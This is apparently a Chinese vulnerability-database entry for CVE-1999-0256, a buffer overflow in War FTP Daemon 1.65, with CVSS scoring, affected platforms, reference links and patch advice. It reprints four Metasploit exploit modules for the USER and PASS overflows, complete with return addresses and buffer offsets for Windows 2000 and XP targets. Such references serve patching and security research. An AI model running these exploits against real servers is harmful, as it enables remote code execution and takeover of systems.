CVE-1999-0256
CVSS7.5
发布时间 :1998-02-01 00:00:00
修订时间 :2008-09-09 08:34:08
NMCOEPS    

[原文]Buffer overflow in War FTP allows remote execution of commands.


[CNNVD]War FTPD USER/PASS命令超长参数缓冲区溢出漏洞(CNNVD-199802-006)

        
        War FTP Daemon是32位Windows平台上的FTP服务器。
        War FTPD在处理带有超长参数的USER/PASS命令时存在缓冲区漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令从而控制服务器。
        <**>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_95Microsoft Windows 95
cpe:/a:jgaa:warftpd:1.66
cpe:/o:microsoft:windows_ntMicrosoft Windows NT

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0256
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0256
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199802-006
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/875
(UNKNOWN)  OSVDB  875

- 漏洞信息

War FTPD USER/PASS命令超长参数缓冲区溢出漏洞
高危 其他
1998-02-01 00:00:00 2005-05-02 00:00:00
远程  
        
        War FTP Daemon是32位Windows平台上的FTP服务器。
        War FTPD在处理带有超长参数的USER/PASS命令时存在缓冲区漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令从而控制服务器。
        <**>

- 公告与补丁

        厂商补丁:
        Jarle Aase
        ----------
        目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.jgaa.com/warftpd.htm

- 漏洞信息 (16706)

War-FTPD 1.65 Password Overflow (EDBID:16706)
windows remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: warftpd_165_pass.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Password Overflow',
			'Description'    => %q{
					This exploits the buffer overflow found in the PASS command
				in War-FTPD 1.65. This particular module will only work
				reliably against Windows 2000 targets. The server must be
				configured to allow anonymous logins for this exploit to
				succeed. A failed attempt will bring down the service
				completely.
			},
			'Author'         => 'hdm',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000',
						{
							'Platform' => 'win',
							'Ret'      => 0x5f4e772b # jmp ebx in the included MFC42.DLL
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 1998'))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(566) + payload.encoded
		buf[558, 2]  = "\xeb\x06"
		buf[562, 4]  = [ target.ret ].pack('V')

		# Send USER Command
		send_user(datastore['FTPUSER'])

		# Send PASS Command
		send_cmd(['PASS', buf], false)

		handler
		disconnect
	end

end
		

- 漏洞信息 (16724)

War-FTPD 1.65 Username Overflow (EDBID:16724)
windows remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: warftpd_165_user.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					],
					# Target 3
					[
						'Windows XP SP3 English',
						{
							'Ret'      => 0x71ab2b53 # push esp, ret
						}
					]
				],
			'DisclosureDate' => 'Mar 19 1998'))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83063)

War-FTPD 1.65 Password Overflow (PacketStormID:F83063)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-1999-0256
[点击下载]

This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Password Overflow',
			'Description'    => %q{
				This exploits the buffer overflow found in the PASS command
				in War-FTPD 1.65. This particular module will only work
				reliably against Windows 2000 targets. The server must be
				configured to allow anonymous logins for this exploit to
				succeed. A failed attempt will bring down the service
				completely.
			},
			'Author'         => 'hdm',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000',
						{
							'Platform' => 'win',
							'Ret'      => 0x5f4e772b # jmp ebx in the included MFC42.DLL
						},
					],
				]))

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(566) + payload.encoded
		buf[558, 2]  = "\xeb\x06"
		buf[562, 4]  = [ target.ret ].pack('V')

		# Send USER Command
		send_user(datastore['FTPUSER'])

		# Send PASS Command
		send_cmd(['PASS', buf], false)

		handler
		disconnect
	end

end
    

- 漏洞信息 (F82932)

War-FTPD 1.65 Username Overflow (PacketStormID:F82932)
2009-10-30 00:00:00
riaf  metasploit.com
exploit,overflow
CVE-1999-0256
[点击下载]

This Metasploit module exploits a buffer overflow found in the USER command of War-FTPD 1.65.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'BID', '10078'	],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					],
					# Target 3
					[
						'Windows XP SP3 English',
						{
							'Ret'      => 0x71ab2b53 # push esp, ret
						}
					]					
				]))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
    

- 漏洞信息

875
WarFTPd USER/PASS Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

WarFTPD contains a flaw that allows a remote attacker execute arbitrary code. The issue is due to improper bounds checking for the USER and PASS commands. If an attacker supplies a specially crafted request they may be able to overflow the buffer and execute arbitrary code with the same privileges as the server.

- 时间线

1998-03-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.66x4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

WarFTP Username Stack-Based Buffer-Overflow Vulnerability
Boundary Condition Error 22944
Yes No
2007-03-13 12:00:00 2007-11-01 09:16:00
This issue was disclosed as part of the Immunity Partner's program.

- 受影响的程序版本

War FTP Daemon WarFTP 1.65

- 漏洞讨论

WarFTP is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue could lead to denial-of-service conditions and to the execution of arbitrary machine code in the context of the application.

WarFTP 1.65 is vulnerable; other versions may also be affected.

- 漏洞利用

The following exploit is available to members of the Immunity Partner's program:

https://www.immunityinc.com/downloads/immpartners/warftp_165.tar

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploits are also available:

- 解决方案

Reports indicate that the vendor fixed this issue in version 1.80. Please contact the vendor for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站